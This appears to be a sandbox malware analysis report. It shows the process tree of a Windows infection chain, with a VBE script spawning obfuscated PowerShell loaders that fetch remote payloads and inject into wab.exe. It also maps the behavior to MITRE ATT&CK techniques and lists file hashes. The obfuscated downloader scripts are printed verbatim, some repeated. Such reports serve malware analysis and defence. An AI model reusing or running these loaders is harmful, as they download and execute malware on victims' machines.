"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Siccimeter = 1;$Wattmetre='Su';$Wattmetre+='bstrin';$Wattmetre+='g';Function Alethoscope71($Drmmeanalysernes){$Corsage=$Drmmeanalysernes.Length-$Siccimeter;For($Falsummer=5;$Falsummer -lt $Corsage;$Falsummer+=6){$Imperalistiske+=$Drmmeanalysernes.$Wattmetre.Invoke( $Falsummer, $Siccimeter);}$Imperalistiske;}function zabra($Overproportion){& ($Myrdedes) ($Overproportion);}$Eneanpartshavernes=Alethoscope71 'FormiM Af.aoNattez,ndusiL.ffalAvan l MascaMoent/Sknhe5 Avol.,lmue0backs Sch.s(M teoW Hamfi Auton Uns,dFl.oro CentwGenins Mon. klunsN PoteTPoste Ca.t1Limbe0 itri.Biobi0Ra,df;lini. BlikvWStu.ei Be.rn illm6 Euf,4Sq.ir;T,der Quifx anti6pro.i4Karkl; Inte PrsumrDetecvFyld.:Cacci1 Stag2 ,iss1O.era.Eutr 0Studi)Pseud ,nklaGAse aeTranqcDipalkThorvo Sikk/Ungua2Ydmy.0Unmon1Eurov0 Sylv0Cirku1.udde0Disse1Unmem For dFInteriredigrKunsteStdvif BegaoGast x Genn/P.lst1Spill2.othe1Grube.,rogl0 samm ';$Disaccharidase=Alethoscope71 'oprusUSupersElenieVrelsrVeinw-Ef,erAVintegjuri,ezeb.anDissttHalvs ';$Gennemblades=Alethoscope71 'ska,th VicetDebatt.aarepFrdses.ager:Oppr,/V.ola/ ysiuwRekrewFlagrw Unin.,emissLivske ForrnServodUndubs OverpDomi,aSkrkkcElecte Dubl.Forf,cC mpeoVankemTra.s/ Fo,kpDyr er.morooSub,e/ BistdFatesl Symp/HavbiaNonopz CatakBogbijMonadmGra,ifDjvle ';$Bedstevenners=Alethoscope71 'Swash> hyro ';$Myrdedes=Alethoscope71 'BedcoiCompreFeminxServa ';$Renteflsomme='Superjudicial175';zabra (Alethoscope71 'FotomSM ifeeEndomtMatfe- OverCPirogoData n Hao,tJuleaeUdmntnClau tTrldo Unnat-,pkalPCa.dia HingtGoddeh Impa IntelTFri r:maelk\NavneR PastuW.relsBefritBl.esi,meltcP,rveaQua.itMarkio DuscrAngor.Br.set StevxIntertvandf Amfi-Ho blV GaleaV,ljel JunguOfftreKarte Ri al$Tra kRAlkaleUf ldnGipsetL ndeeTils,fAtmialO tplsAutomoG,nnemorddemTi,everot t;Ne.ri ');zabra (Alethoscope71 'unpariSwayef Wamu schem(L.ramtWirepeHypsos Sammt,sfor-IcierpToranaOsseotVideohHeadl HiemaTP,ila:Evang\L dskRCircuuSubresBannet StoniTropic,oenta BandtRicksoFolk.rN.hil..eclitC cloxHamalt Cope) Leve{ OrnaeAmortxTar.aiLineatP rri} Pott; R ma ');$Informationsmaengder = Alethoscope71 'JuleseSerpecProtohOutgroFader Serap%Genfra UnivpDarbhp ,amadF rtoaRefortderriaCoact%Phosp\.ronuiAlgols Sym.oFor.ilHerreiMong nSnoreo LefllSpu seOv.rsn Lyg iBekk,c ivsb. TranO Jap vS,rumeOppus Sap n&Pasi,&Under Miljme P.loc HydrhHe.ocoAgter Calin$Sterl ';zabra (Alethoscope71 'Gifte$ Affig,anagl,ubapo.nwrabAmbita CykllKonst:RessoG ranrS.aaruIstann f ysdStepcmF raguSkrumr,nifie Om,ln ypoce,onsts,arie= Bouc(Sr,lac nstimStaklduns,c Bagg/ BouncDeis Samm$JeppeI stornKartefcalcioTil,grArsenmSkiftaSymb tRegnsiAfko ouddran Torbs Cashm p tiaShoddeTimotnKvintgsubduddiamie Hum.rAchiy) Farm ');zabra (Alethoscope71 'H ssa$OutcagovertlUnunaoN,nfob RailaP.litlBifen: NontFStep.oSpectrengrau Afgar.onceeVernanBn,haeWrastnPseuddAf,oleKapu,=Parae$ nalGLeucieStammn,dtalnR ordeBomrkmIn robAntholSlo pa.ulindHi.dreHumansFirs,.Rekurs NongpGun ylCongriStrejtElect(Mumps$EfterBst tieTupi,dNedt sWestmt .vere My ev RecoeKniv,n ElsknRectoeDragorVirkesSlimp)D.flj ');$Gennemblades=$Forurenende[0];zabra (Alethoscope71 'B.rts$MacbegNonfulMultioNy.rubGurura .umplTo ga:MasteZ .ncui NonhsSkrvik Ve.iaStvne=JakfrNPareneGrundwBlomk-DroluOtelttbBeastjLignieK adrcVariatUnpop K ubSWreakyNon.as.unnetWereceFl gemK.ind. Vi eNInconeUncontUnshr. Hi,cWVrange plusb M.skCPrieslBick iClubbeOluffn prertRhode ');zabra (Alethoscope71 'Akva $In.viZWithbiThatcs ColikDiffea Tita.Lum,iH uffye pe,sa pild Bib eProtorWholesUimod[Li us$SocioD AsieiFacilsLicheaJ ssicSpyttc SemihKom aacogwar Spili .ensd MollaHumilsSyndeeEkste] Nonl=odont$kompoEIsoninTagale,meriaLacemnRefunp,lectaNoncorM llotLigemsSkntrhBogklaJalouvFooteeAlterrForstnSikkeeDitzssV,lla ');$Bronchitic=Alethoscope71 ' GrovZBlackiStoolsHe stkAffa.aTheat. grnsDExspooForhawAilannCoupllV teroBiporaScorid,tomaFUnridiproc.lp osleChris( Bout$ rillGSkammeAutornSalignDiscoeBjergmgrandb fo,tlModviaAfkoldmyth eAnfrbsAudie,Gipsb$IntonSDickipTeariaM trotBootpcAfmyth M.ttc Skrio W aicA,bifkblitz5 Serv9F.urn)Laser ';$Bronchitic=$Grundmurenes[1]+$Bronchitic;$Spatchcock59=$Grundmurenes[0];zabra (Alethoscope71 'Rots.$Helbrg Alsil Ove,o highbSkovlaPneumlFleur:JurisIWallsn,entes OpkaeSk,bmcGasrat St miBlybacPederiSynkrdambl,e Naba=Unbod(Bill,Tflosse.nucksNormatS ffi- fortPMisusa I.ddt NedshLovre Cryp$RaciaSHjemmpRenalaGenn.tTildicNetvrh.ragtcUngluoF.rfucValgfkO erp5K pec9,onde)troll ');while (!$Insecticide) {zabra (Alethoscope71 'Natti$HowbegDrainlAntifo A trbErranaMudlal ogu:SemipDCumuleOriensCobe.a DatavJenskoRealkuDundeevinkorForsaiFedernUrceogPigede .midrBek e=Pancr$ Tr,mtAfm trBo.bouAdulte aver ') ;zabra $Bronchitic;zabra (Alethoscope71 'BarriSGenictKlokkaKonger.ndskt Cann- SkydSPar,ilP kleeendetePyn epbebyr Inval4,even ');zabra (Alethoscope71 ' Sigj$GarangMinimlDe onoTnkelb SheoaClunilKarnf:redisIHeartnSl ntsNedskeUncencSign.tArmodiFagkycChalciCeratdSol ee Out =Efter( agneTe traedokumsslurrthenty-Clot,PSixmoa SenotguayahMind. Waggo$U.ennSSamm.pAfs,aaBeln tPoticcSiderhTenorc Jv,doF rehc DebikUnali5Elysi9 Cut )urost ') ;zabra (Alethoscope71 ' Re.r$Indbyg FordlPlejeoStra bSubpaaAutoml Kloe: Da.sT udseiUdty lBlackoBekymrDis rd Zinkn Cry,e sej r,yrre=Ortho$ Ch,sgPejlelReso,oL irsbrekuraIchthl Epim: JellB LittaCrabbrElgt,sCalloeRkenvlVesicsA.vorf EgeteDeklibFreckePa.opr lomeAntidnKa nfsAppri+Mispr+Markh%Tekst$KaadmFRicheoChaenr Mod.uLimonrLovf,epasfonBetraeMicr.nYdelsdSupereNipsg.SprawcWau hoUn.esuPtpconAfladtVisar ') ;$Gennemblades=$Forurenende[$Tilordner];}$Skandinaviensrejses=322661;$Thirlages=28492;zabra (Alethoscope71 'Suf l$Br.dygVe nulvagtsolysebb enoaIndstl nons:FagspB Lig l a,atl LerseSaledh AwheaHa,ket SelftSpagne ejrsnTeksteVa,visOntic1Afdel1Spoon2,pith Adjus=k.nce ForstG AfhoePers,tSvir.-B.edeCKarakoVortin KulttNow,seGi.nenFritntKlode Ident$Ta,waS.utodpPasseaHy letC,chlcHorolhtossecSalitoS.ckecOncogkJoz.t5Filla9 Skue ');zabra (Alethoscope71 ' gal $ThumbgFremslPurrioDeallbA.ayraB.fiplTersh:RadioDLa,ahiNon.ra,ndgigCeleboNorm,nU fsliPickwa.nthrlDrnud cutic=Prekr s,il[J rypSAfklay Tur,s krumtE.peceStendmFer,i.TelefC .freoKonson DodevTeglveReassrScaputCeleb]cit,u:Servo:MissiFRetorrTota,oDesmomkanflBDeriva Exp.sEudioePtole6S lia4 MokkS PlastUsa,drSelskiVandrn TuyegA,chc(Short$KlageB EnkelEjendl Fa teUn.lah LifeaasmintLitzytT asseClearnSto.deSamfusOxidi1 Sasa1Ho,er2Sa,ro)iodin ');zabra (Alethoscope71 ' .pid$AutorgOcea.lAk.ioo vintbT,deraBeb,tl rahm:SprinN IndeaBadehtI,plauPrebrr Kvi,fBefalr Han.e BrnddSimrenFi,mkiKraten iligg Br dsFoste Kab n=Recep fre m[fasefSFlintynit,nsEvangt Forse RevymBytte.GastrTPositeP.lerx D,ejtBests.LaminEFremsn Unm,cSe,teoFeme.dTypoliOuttrnTordig Vach]Outwa:Skovl:EnsluAI,serSSuperCReassIAlsidIiskol.flereGGalvae Sh,utImmunSP,iretStjdmrSlagtiC ntanOpiumgJann,( Bell$ DeriD SuttiI.conaJuntagS.ovsov rianPre ci befsaOutkilUnree)Tcha, ');zabra (Alethoscope71 'Inven$B.elagTempelrussioPhacobUntemaSelvblGlory:HardbSBowshc ForsuChemitRemuluA,kohl Seksaranie=Disas$SemipNRepada Mar.tBibelu F rmr ThyrfBritir.rimreIs.eldUgyldnAn.rkiKer tn Unimg.etodsFdeva. SporsDazaeuPha ib C.thsToxaet M elrNonriiLaesenxylopg.efec( Rigs$ AgreSEjerskBefola Tes.nRundkd LisciSur,enFordjaInterv tilii Spile EksanA ades Ku,trSti,ce,edbrjEcurisDdsn.e TransUnder,Borde$Jami,T kapihSaloniKowtor dew,lEquivaSulevg quire S.avs Deci)primf ');zabra $Scutula;"
11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\isolinolenic.Ove && echo $"
12⤵
PID:5584

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tvtapb.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) {Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"
7⤵
PID:4840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) {Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"
8⤵
PID:3080

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
